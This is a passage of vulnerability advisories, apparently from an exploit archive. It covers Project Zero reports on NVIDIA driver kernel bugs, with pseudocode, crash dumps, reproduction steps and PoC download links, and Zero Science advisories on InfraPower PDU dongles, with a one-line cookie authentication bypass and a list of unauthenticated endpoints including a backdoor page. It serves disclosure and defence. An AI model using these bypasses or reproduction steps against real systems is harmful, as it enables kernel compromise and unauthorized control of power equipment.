|Dst|, but rather the calculated size of the filename. |Dst| is a stack buffer
that is at least 255 characters long. The the maximum component paths of most
filesystems on Windows have a limit that is <= 255 though, so this shouldn't be
an issue on normal filesystems.
However, one can pass UNC paths to CreateProcessW containing forward slashes as
the path delimiter, which means that the extracted filename here can be
"a/b/c/...", leading to a buffer overflow. Additionally, this function has no
stack cookie.
e.g.
CreateProcessW(L"\\\\?\\UNC\\127.0.0.1@8000\\DavWWWRoot\\..../..../..../blah.exe", ...
Crashing context with my PoC (Win 10 x64 with 372.54):
NvStreamKms+0x1c6a:
fffff801`5c791c6a c3 ret
kd> dqs rsp
ffffd000`25bc5d18 00410041`00410041
kd> t
...
KMODE_EXCEPTION_NOT_HANDLED (1e)
...
FAULTING_IP:
NvStreamKms+1c6a
fffff800`5b1d1c6a c3 ret
To reproduce, a WebDAV server is required (can be localhost), and the WebClient
service needs to be started (start can be triggered by user without additional privileges).
Then, run setup to create the long path to the target executable (you'll need to
change the base directories), and then run poc_part1, and then poc_part2 (with
the right UNC path) on the target machine.
Proofs of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40660.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=911
The DxgkDdiEscape handler for 0x600000D passes an unchecked user provided
pointer as the destination for a memcpy call. This leads to kernel memory
corruption.
(Win 10 x64 372.54) crashing context with PoC:
SYSTEM_SERVICE_EXCEPTION (3b)
CONTEXT: ffffd000c076c8b0 -- (.cxr 0xffffd000c076c8b0)
rax=0000000000000880 rbx=0000000000000000 rcx=000000000000000f
rdx=bebe9ec057cc7d47 rsi=ffffd000c076d870 rdi=ffffe001990da008
rip=fffff8010f1eab00 rsp=ffffd000c076d2d8 rbp=ffffd000c076d360
r8=0000000000003ff1 r9=fffff8010f217d48 r10=fffff78000000008
r11=4141414141414141 r12=0000000000000000 r13=ffffe001990dbe88
r14=ffffe001945f1201 r15=0000000000004000
iopl=0 nv up ei pl nz ac pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010212
nvlddmkm+0x5dab00:
fffff801`0f1eab00 f3410f7f03 movdqu xmmword ptr [r11],xmm0 ds:002b:41414141`41414141=????????????????????????????????
Resetting default scope
To reproduce, compile the PoC as a x64 binary (requires WDK for D3DKMTEscape),
and run.
For completeness, it looks like many of the other escape handlers in the same function has similar issues with writing to user provided pointers in an unchecked way. This should have been fairly obvious as the code is very close to each other in the same function.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40659.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=895
The DxgkDdiEscape handler for 0x7000194 doesn't do bounds checking with the
user provided lengths it receives. When these lengths are passed to memcpy,
overreads and memory corruption can occur.
void __fastcall escape_7000194(NvMiniportDeviceContext *ctx, Escape7000194 *escape_data)
...
alloc_0_ = ExAllocatePoolWithTag_(PagedPool, escape->size_0, 0x7061564Eu);
...
alloc_1 = ExAllocatePoolWithTag_(PagedPool, escape->size_1, 0x7061564Eu);
..
if ( (_BYTE)v11 ) {
memcpy(alloc_0, escape->buf_0, escape->size_0);
memcpy(alloc_1, escape->buf_2, escape->size_1);
}
v8 = Escape7Handler(0i64, dword_7DCB84, *(_DWORD *)(v3 + 24), 0x402C0105, &escape->data, 96);
v9 = v8;
if ( !(_BYTE)v11 && !v8 )
memcpy(escape->buf_0, alloc_0, escape->size_0);
...
The PoC I've provided causes an OOB read, but it should be possible to pass an
input that results in the third memcpy being executed instead of the first two,
which leads to kernel memory corruption (OOB write).
(Win 10 x64 372.54) crashing context with PoC:
PAGE_FAULT_IN_NONPAGED_AREA (5)
...
Some register values may be zeroed or incorrect.
rax=0000000000000007 rbx=0000000000000000 rcx=ffffc000f5220f80
rdx=fffffffff3d5509c rsi=0000000000000000 rdi=0000000000000000
rip=fffff8007d4dad66 rsp=ffffd00166b9d2a8 rbp=ffffc000e8f55038
r8=0000000000020fc0 r9=000000000006603e r10=0000000000020000
r11=ffffc000f5200000 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei pl nz na pe nc
nvlddmkm+0x5dad66:
fffff800`7d4dad66 f30f6f4c0ae0 movdqu xmm1,xmmword ptr [rdx+rcx-20h] ds:ffffc000`e8f75ffc=????????????????????????????????
Resetting default scope
To reproduce, compile the PoC as a x64 binary (requires linking with
setupapi.lib, and WDK for D3DKMTEscape), and run. It may require some changes
as for it to work as the escape data must contain the right values (e.g. a
field that appears to be gpu bus device function). My PoC should hopefully set
all the right values for the machine it's running on.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40658.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=894
The DxgkDdiEscape handler for 0x700010d accepts a user provided pointer as the
destination for a memcpy call, without doing any checks on said pointer.
void __fastcall escape_700010D(NvMiniportDeviceContext* ctx, NvEscapeData *escape)
{
...
v8 = escape->unknown_2;
if ( v8 == 1 )
{
data.size = escape->size;
data.buf = ExAllocatePoolWithTag((POOL_TYPE)512, 0xC08i64 * data.size, 0x7061564Eu);
v9 = Escape7Handler(0i64, dword_7DCB84, dword_7DCB84, 626, &data, 0x190);
}
...
else if ( escape->unknown_2 == 1 )
{
memcpy(escape->user_ptr, data.buf, 3080i64 * escape->size);
(Win 10 x64 372.54) crashing context with PoC (in memcpy) on a write to 0x4141414141414141:
SYSTEM_SERVICE_EXCEPTION (3b)
...
CONTEXT: ffffd0002d2ab5c0 -- (.cxr 0xffffd0002d2ab5c0)
rax=0000000000000001 rbx=ffffc0016c9b9b40 rcx=000000000000000f
rdx=bebe9ebf4b4e0ecf rsi=0000000000000001 rdi=000000007061564e
rip=fffff8005488ab00 rsp=ffffd0002d2abfe8 rbp=ffffd0002d2ac0f0
r8=0000000000000bf9 r9=ffffd00024014ac0 r10=0000000000000000
r11=4141414141414141 r12=0000000000000340 r13=fffff800542b0000
r14=ffffe0008fb2d000 r15=0000000000000001
iopl=0 nv up ei pl nz ac po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010216
nvlddmkm+0x5dab00:
fffff800`5488ab00 f3410f7f03 movdqu xmmword ptr [r11],xmm0 ds:002b:41414141`41414141=????????????????????????????????
To reproduce, compile the PoC as a x64 binary (requires linking with
setupapi.lib, and WDK for D3DKMTEscape), and run. It may require some changes
as for it to work as the escape data must contain the right values (e.g. a
field that appears to be gpu bus device function). My PoC should hopefully set
all the right values for the machine it's running on.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40657.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=892
The handler for the DxgkDdiEscape escape code 0x70000D4 has the following pseudocode:
void __fastcall escape_70000D4(NvMiniportDeviceContext *a1, NvEscapeData *a2)
{
Escape70000D4 *escape_data_; // rbx@1
PVOID alloc_buf; // rsi@1
unsigned int v4; // edi@1
__int64 user_ptr; // r14@4
DWORD *v6; // rbx@5
__int128 v7; // [rsp+40h] [rbp-38h]@1
__int128 v8; // [rsp+50h] [rbp-28h]@4
PVOID alloc_buf_; // [rsp+60h] [rbp-18h]@4
escape_data_ = (Escape70000D4 *)a2;
a2->unknown_rest[6] = 1;
LODWORD(v7) = 0;
memset((char *)&v7 + 4, 0, 0x24ui64);
alloc_buf = ExAllocatePoolWithTag_(PagedPool, escape_data_->user_ptr_size, 'paVN');
v4 = 0;
if ( !alloc_buf )
v4 = 0xFFFF;
if ( v4 )
goto LABEL_12;
HIDWORD(v8) = escape_data_->user_ptr_size;
alloc_buf_ = alloc_buf;
v4 = sub_625BC(0i64, dword_B1BB94, escape_data_->unknown_0, 0x83F30101, (__int64)&v7, 40);
user_ptr = escape_data_->user_ptr;
ProbeForWrite((PVOID)escape_data_->user_ptr, escape_data_->user_ptr_size, UserMode);
memcpy((void *)escape_data_->user_ptr, alloc_buf, escape_data_->user_ptr_size);
*(_OWORD *)&escape_data_->unknown_2 = v7;
*(_OWORD *)&escape_data_->unknown_4 = v8;
escape_data_->user_ptr = user_ptr;
if ( v4 )
{
LABEL_12:
v6 = &escape_data_->header.unknown_rest[6];
if ( v6 )
{
if ( v4 <= 0xFFFFF000 )
*v6 = -4096 - v4;
}
}
if ( alloc_buf )
ExFreePoolWithTag_(alloc_buf, 0x7061564Eu);
}
ExAllocatePoolWithTag is called with a user provided size to allocate a buffer, but the subsequent copying of said buffer to the user provided pointer doesn't make sense since the buffer is never initialised with any values. This means that a user mode program can leak uninitialised memory from arbitrarily-sized pool allocations.
########
Looks like I made an oversimplified analysis of the pseudocode in the report. The allocated buffer pointer is indeed passed off to the sub_625BC function (as part of a struct member on the stack) which eventually passes it to a bunch of other functions.
However, this doesn't change the fact that with the provided PoC, the pool allocated buffer still isn't being initialised and is copied into the user buffer unchanged.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40656.zip
InfraPower PPS-02-S Q213V1 Authentication Bypass Vulnerability
Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.
Desc: The device does not properly perform authentication, allowing
it to be bypassed through cookie manipulation. The vulnerable function
checkLogin() in 'Function.php' checks only if the 'Login' Cookie is empty
or not, allowing easy bypass of the user security mechanisms.
Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5374
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5374.php
27.09.2016
--
(example) System.php:
---------------------
1: <?php
2:
3: require_once("Function.php");
4: session_start();
5: if(!checkLogin())
6: header('Location: Login.php');
7:
---------------------------------------
Function.php:
-------------
155: function checkLogin(){
156: if(empty($_SESSION['Login']))
157: return false;
158: return true;
159: }
160:
--------------------
'Sessioned' scripts:
➜ www grep -rHn 'session_start' /Users/liwomac/Desktop/infrapower_files/www
/Users/liwomac/Desktop/infrapower_files/www/Firmware.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/FWUpgrade.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/Login.php:2: session_start();
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:2: session_start();
/Users/liwomac/Desktop/infrapower_files/www/OutletDetails.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/OutletDetails_Ajax.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/PDUDetails.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/PDUStatus.php:9: session_start();
/Users/liwomac/Desktop/infrapower_files/www/PDUStatus_Ajax.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/SensorDetails.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/SensorStatus.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/SNMP.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/System.php:4: session_start();
/Users/liwomac/Desktop/infrapower_files/www/User.php:3: session_start();
➜ www grep -rHn 'session_destroy' /Users/liwomac/Desktop/infrapower_files/www
/Users/liwomac/Desktop/infrapower_files/www/Function.php:256: session_destroy();
/Users/liwomac/Desktop/infrapower_files/www/Function.php:266: session_destroy();
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:7: session_destroy();
/Users/liwomac/Desktop/infrapower_files/www/System.php:53: session_destroy();
/Users/liwomac/Desktop/infrapower_files/www/System.php:63: session_destroy();
➜ www grep -rHn '$_SESSION' /Users/liwomac/Desktop/infrapower_files/www
/Users/liwomac/Desktop/infrapower_files/www/Function.php:11: if(isset($_SESSION['ite'])){
/Users/liwomac/Desktop/infrapower_files/www/Function.php:12: $this->init($_SESSION['ite']);
/Users/liwomac/Desktop/infrapower_files/www/Function.php:156: if(empty($_SESSION['Login']))
/Users/liwomac/Desktop/infrapower_files/www/Function.php:233: if(!isset($_SESSION['TimeSync'])){
/Users/liwomac/Desktop/infrapower_files/www/Function.php:234: $_SESSION['TimeSync'] = getConf("/mnt/mtd/main_conf", "TimeSyncPDU_opt");
/Users/liwomac/Desktop/infrapower_files/www/Function.php:235: if($_SESSION['TimeSync'] == "ON"){
/Users/liwomac/Desktop/infrapower_files/www/Function.php:237: $_SESSION['SyncDate'] = explode(":",$SyncDate);
/Users/liwomac/Desktop/infrapower_files/www/Function.php:239: $_SESSION['TimeSync'] = "OFF";
/Users/liwomac/Desktop/infrapower_files/www/Function.php:240: $_SESSION['SyncDate'][0] = "0";
/Users/liwomac/Desktop/infrapower_files/www/Function.php:241: $_SESSION['SyncDate'][1] = "0";
/Users/liwomac/Desktop/infrapower_files/www/Function.php:255: unset($_SESSION['Login']);
/Users/liwomac/Desktop/infrapower_files/www/Function.php:265: unset($_SESSION['Login']);
/Users/liwomac/Desktop/infrapower_files/www/Login.php:31: $_SESSION['ite'] = substr($this->InfraType,1,1); // e.g."t3v3" get the second chr 3;
/Users/liwomac/Desktop/infrapower_files/www/Login.php:64: $_SESSION['ite'] = "1";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:67: $_SESSION['ite'] = "2";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:70: $_SESSION['ite'] = "3";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:73: $_SESSION['ite'] = "3";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:76: $_SESSION['ite'] = "3";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:79: $_SESSION['ite'] = "4";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:82: $_SESSION['ite'] = FALSE;
/Users/liwomac/Desktop/infrapower_files/www/Login.php:91:$_SESSION['ite'] = $InfraType;
/Users/liwomac/Desktop/infrapower_files/www/Login.php:137: $_SESSION['Login'] = $_POST['ID_User'];
/Users/liwomac/Desktop/infrapower_files/www/Login.php:140: $_SESSION['Login'] = $_POST['ID_User'];
/Users/liwomac/Desktop/infrapower_files/www/Login.php:156: if (isset($_SESSION['ite']) && $_SESSION['ite']=="3") {
/Users/liwomac/Desktop/infrapower_files/www/Login.php:167: if (isset($_SESSION['ite']) && $_SESSION['ite']=="3") {
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:3: $_SESSION['Login'];
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:4: if (isset($_SESSION['Login'])){
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:5: unset($_SESSION['Login']);
/Users/liwomac/Desktop/infrapower_files/www/Menu.php:60: /*if ($_SESSION["SS_SystemCreated"] == "1") {
/Users/liwomac/Desktop/infrapower_files/www/System.php:52: unset($_SESSION['Login']);
/Users/liwomac/Desktop/infrapower_files/www/System.php:62: unset($_SESSION['Login']);
➜ www grep -rHn 'checkLogin' /Users/liwomac/Desktop/infrapower_files/www
/Users/liwomac/Desktop/infrapower_files/www/Firmware.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/Function.php:155: function checkLogin(){
/Users/liwomac/Desktop/infrapower_files/www/FWUpgrade.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/Login.php:165: if(checkLogin()) {
/Users/liwomac/Desktop/infrapower_files/www/OutletDetails.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/OutletDetails_Ajax.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/PDUDetails.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/PDUStatus.php:10: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/PDUStatus_Ajax.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/SensorDetails.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/SensorStatus.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/SNMP.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/System.php:5: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/User.php:4: if(!checkLogin())
PoC:
javascript:document.cookie="Login=StrangerThings;expires=Sat, 09 Dec 2017 11:05:17 GMT"
--
InfraPower PPS-02-S Q213V1 Insecure Direct Object Reference Authorization Bypass
Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.
Desc: Insecure Direct Object References occur when an application
provides direct access to objects based on user-supplied input. As
a result of this vulnerability attackers can bypass authorization
and access resources and functionalities in the system directly, for
example APIs, files, upload utilities, device settings, etc.
Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5373
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5373.php
27.09.2016
--
GET /ConnPort.php
GET /CSSSource.php
GET /dball.php
GET /doupgrate.php
GET /IPSettings.php
GET /ListFile.php
GET /Menu.php
GET /Ntp.php
GET /PDUDetails_Ajax_Details.php
GET /PDULog.php
GET /PortSettings.php
GET /production_test1.php ("backdoor")
GET /UploadEXE.php